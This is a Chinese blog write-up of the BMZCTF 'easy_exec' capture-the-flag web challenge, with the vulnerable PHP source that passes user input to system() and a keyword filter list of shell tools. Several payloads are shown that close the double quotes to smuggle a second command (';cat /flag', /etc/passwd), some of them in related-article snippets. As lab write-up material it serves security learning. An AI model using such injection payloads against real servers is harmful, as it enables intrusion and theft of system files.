easy_exec

最新推荐文章于 2022-12-23 16:32:00 发布
最新推荐文章于 2022-12-23 16:32:00 发布
阅读量217 收藏
点赞数 1
分类专栏: # BMZCTF 文章标签: php web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51652864/article/details/116355915
版权

easy_exec
题目
打开环境,得到:
在这里插入图片描述

看下源码,发现有个de.php,访问:
在这里插入图片描述

<?php

highlight_file(__FILE__);

$comm1 = $_GET['comm1'];
$comm2 = $_GET['comm2'];


if(preg_match("/\'|\`|\\|\*|\n|\t|\xA0|\r|\{|\}|\(|\)|<|\&[^\d]|@|\||tail|bin|less|more|string|nl|pwd|cat|sh|flag|find|ls|grep|echo|w/is", $comm1))
    $file1 = "";
if(preg_match("/\'|\"|;|,|\`|\*|\\|\n|\t|\r|\xA0|\{|\}|\(|\)|<|\&[^\d]|@|\||ls|\||tail|more|cat|string|bin|less||tac|sh|flag|find|grep|echo|w/is", $comm2))
    $file2 = "";

$flag = "#flag in fllllag";

$comm1 = '"' . $comm1 . '"';
$comm2 = '"' . $comm2 . '"';

$cmd = "file $comm1 $comm2";
system($cmd);
?>

进行下代码审计,其实这个就是个闭合双引号的问题,一步步构造payload:
先试验了comm1="cat /flag"&comm2=,得到:
在这里插入图片描述
结合这下面得提示与第一个正则匹配,试着继续构造comm1=flag"cat%20/flag"&comm2=/etc/passwd
得到:
在这里插入图片描述
可知在flag与cat中间应该要加一个分号,继续构造comm1=flag";cat%20/flag"&comm2=/etc/passwd
在这里插入图片描述

o3Ev
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
buu-EasyBypass
qaq517384的博客
10-27 614
考点: linux分号执行多条命令 ?正则匹配flag 打开环境 <?php highlight_file(__FILE__); $comm1 = $_GET['comm1']; $comm2 = $_GET['comm2']; if(preg_match("/\'|\`|\\|\*|\n|\t|\xA0|\r|\{|\}|\(|\)|<|\&[^\d]|@|\||tail|bin|less|more|string|nl|pwd|cat|sh|flag|find|ls|grep
easyexcle
weixin_52725665的博客
05-03 716
Java解析、生成Excel比较有名的框架有Apache poi、jxl。但他们都存在一个严重的问题就是非常的耗内存,poi有一套SAX模式的API可以一定程度的解决一些内存溢出的问题,但POI还是有一些缺陷,比如07版Excel解压缩以及解压后存储都是在内存中完成的,内存消耗依然很大。easyexcel重写了poi对07版Excel的解析,一个3M的excel用POI sax解析依然需要100M左右内存,改用easyexcel可以降低到几M,并且再大的excel也不会出现内存溢出;
BMZCTF:easy_exec
末初的CSDN博客
02-07 556
http://bmzclub.cn/challenges#easy_exec 查看源码也没发现什么,尝试目录扫描 发现有个index.html,访问查看源码,发现de.php 这题我看搞不懂搞两个正则匹配在这干啥,又没有起到过滤作用,直接双引号闭合,然后执行命令 ?comm1=/flag";cat /flag;"&comm2=/etc/passwd ...
[BMZCTF]-easy_exec
cjdgg的博客
05-23 213
[BMZCTF]-easy_exec 题目直接给出源代码,看这样子,应该又是绕过过滤然后命令执行 这道题先搜一搜file命令的作用,并查看相关参数的作用后,确定file没用后,确定了这题考点应该是要插入我们想要执行的命令 这里看了一下,把反引号和单引号都过滤了,但是却没过滤双引号,偏偏双引号还是这题用来框住命令的 直接构造";cat%20/flag",这两个双引号分别用来闭合题目中的双引号。 成功拿到flag ...
BMZCTF-WEB-easy_exec
qq_24033605的博客
05-24 274
easy_exec 主页显示nofile。 尝试使用dirsearch扫描一下。 扫描发现两个文件。 查看de.php。 显示着一段php代码。 <?php highlight_file(__FILE__); $comm1 = $_GET['comm1']; $comm2 = $_GET['comm2']; if(preg_match("/\'|\`|\\|\*|\n|\t|\xA0|\r|\{|\}|\(|\)|<|\&[^\d]|@|\||tail|bin|less|m
class_easy_pdo:类PHP连接管理Bdd到PDO中的mysql
07-02
class_easy_pdo PDO连接管理类到mysql 请参阅以下载最新的稳定版本 首先,有问题的类: /toolSql/Bdd.class.php 它有两种主要的使用方法: $_SESSION['bdd']->query(string $requete_sql[, array $argument[, ...
Operating Systems Three Easy Pieces
05-24
《Operating Systems: Three Easy Pieces》是一本面向操作系统教学的经典教材,它深入浅出地介绍了操作系统的核心概念和原理。本书的内容覆盖了操作系统设计和实现的多个关键领域,通过案例、讨论和实验,帮助学生...
easy vc sqlite3_master
08-28
在VC中,调用SQLite的API函数`sqlite3_exec()`是一个常用的方法来执行SQL命令。`sqlite3_exec()`函数允许你传递一个回调函数,该函数会在每次查询结果集的一行被返回时被调用。下面我们将详细讨论如何实现这个过程。...
PHP使用curl_multi_select解决curl_multi网页假死问题的方法
12-20
` 和 `curl_easy_cleanup($ch);` 7. 清理 `curl_multi` 对象:`curl_multi_cleanup($mh);` 在并发请求场景下,正确使用 `curl_multi` 和 `curl_multi_select` 可以有效避免CPU占用过高和网页假死问题,同时提高程序...
webgoat-standalone-7.1-SNAPSHOT-exec.jar
11-05
Open a command shell/window, browse to where you downloaded the easy run jar and type: java -jar webgoat-standalone-7.0.1-exec.jar [-p | --p ] [-a | --address ] Using the --help option will show the ...
EasyBypass (;管道符)
qq_62046696的博客
12-23 1283
肯定要把file从命令中注释掉这种,以前接触过闭合然后自己重新构造一个🐎,但是这里好像管道符也可以使用;这样就成功闭合掉了,然后其实还有一个疑问就是我cat /f*的时候也能用,可是|\*|\。这个也就是给传入的参数加了一个引号包起来,然后往上继续查看过滤的字符号剩下什么。如果是 新生类的话,system那里应该换为 new a(b)这种的形式,分号还有,并且tac也没 过滤,flag被过滤掉了但是可以用?报错了查看信息是引号的问题,我们还需要闭合掉引号不然就变成了。就需要我们自己写入闭合。
BMZCTF WEB easy_exec
Crazy198410的博客
01-25 665
打开页面: 显示:no file 查看源码: 发现新的页面de.php,打开: 可以看到源码 要我们输入两个参数,最后与file拼接,再执行。 知道原理后,开始分析代码: <?php highlight_file(__FILE__); $comm1 = $_GET['comm1']; #输入第一个参数 $comm2 = $_GET['comm2']; #输入第二个参数 if(preg_match("/\'|\`|\\|\*|\n|\t|\xA0|\r|\{|\}|\(|.
EasyBypass
qq_54929891的博客
06-23 657
哈哈哈
BUUCTF--EasyBypass
qq_46263951的博客
08-15 805
题目给出代码 <?php highlight_file(__FILE__); $comm1 = $_GET['comm1']; $comm2 = $_GET['comm2']; if(preg_match("/\'|\`|\\|\*|\n|\t|\xA0|\r|\{|\}|\(|\)|<|\&[^\d]|@|\||tail|bin|less|more|string|nl|pwd|cat|sh|flag|find|ls|grep|echo|w/is", $comm1))
[BUUCTF]Easybypass
lllffg的博客
04-16 1319
EasyBypass <?php highlight_file(__FILE__); $comm1 = $_GET['comm1']; $comm2 = $_GET['comm2']; if(preg_match("/\'|\`|\\|\*|\n|\t|\xA0|\r|\{|\}|\(|\)|<|\&[^\d]|@|\||tail|bin|less|more|string|nl|pwd|cat|sh|flag|find|ls|grep|echo|w/is", $comm1)) $
[BUUCTF][web][p5]Easybypass
qq_29060627的博客
03-26 4393
<?php highlight_file(__FILE__); $comm1 = $_GET['comm1']; $comm2 = $_GET['comm2']; if(preg_match("/\'|\`|\\|\*|\n|\t|\xA0|\r|\{|\}|\(|\)|<|\&[^\d]|@|\||tail|bin|less|more|string|nl|pwd|cat|sh|flag|find|ls|grep|echo|w/is", $comm1)) $comm1 = "".
Easy Excel
qq_45896330的博客
06-02 8954
EasyExcel快速开始文档:https://www.yuque.com/easyexcel/doc/easyexcel 看视频着实有点费时间,看视频2小时没弄懂,看官方文档5分钟可以上手了掉赞👍 👍我们可以通过提供的反向工具自动根据生成对应的,不需要人工一行一行的去写了,直接自动生成,只需要设置一个把实体类放在那个文件夹下就Ok 了,然后根据自己的需要稍微的改一改就OK,,爽歪歪😊👍字段名和属性名对应的规则是:字段名中包含下划线‘_’的,属性中会把下划线后边第一个字母大写,驼峰命名👍所以说字段
easy-excel 解决百万数据导入导出,性能很强
热门推荐
u011731053的专栏
11-23 1万+
文章目录前言springboot 整合 easy-excelpom.xmlapplication.yml实现easy-excel 导入、导出实现导入监听导出模拟监听Controller 层service 层mapper 层mapper.xml结语 前言 上个月公司有个老系统反馈,导入导出数据量一大就出现卡顿,半天不响应。刚来领导要求我改造一下,在 gitee 和 度娘搜索比较了几个,easy-excel 性能是非常非常高的,具体还要结合自身的网络环境和代码环境。 springboot 整合 easy-exc
excel读取神奇——easyexcel
Java旅途
10-22 1077
今天给大家安利一款excel文件导入神器,easyexcel,官方地址:(https://github.com/alibaba/easyexcel)。在官网文档中有介绍了其性能。从上面的性能测试可以看出easyexcel在解析耗时上比poiuserModel模式弱了一些。主要原因是我内部采用了反射做模型字段映射,中间我也加了cache,但感觉这点差距可以接受的。但在内存消耗上差别就比较明显了,ea...
curl_formadd和curl_easy_setopt(curl, CURLOPT_HTTPHEADER
最新发布
08-15
curl_exec($ch); // 清理 curl_multi_free(multiPart); curl_close($ch); ``` 请注意,在这个示例中,`curl_formadd` 常用于处理复杂的表单数据结构,而 `curl_easy_setopt(curl, CURLOPT_POSTFIELDS)` 更适合简单...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

o3Ev

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值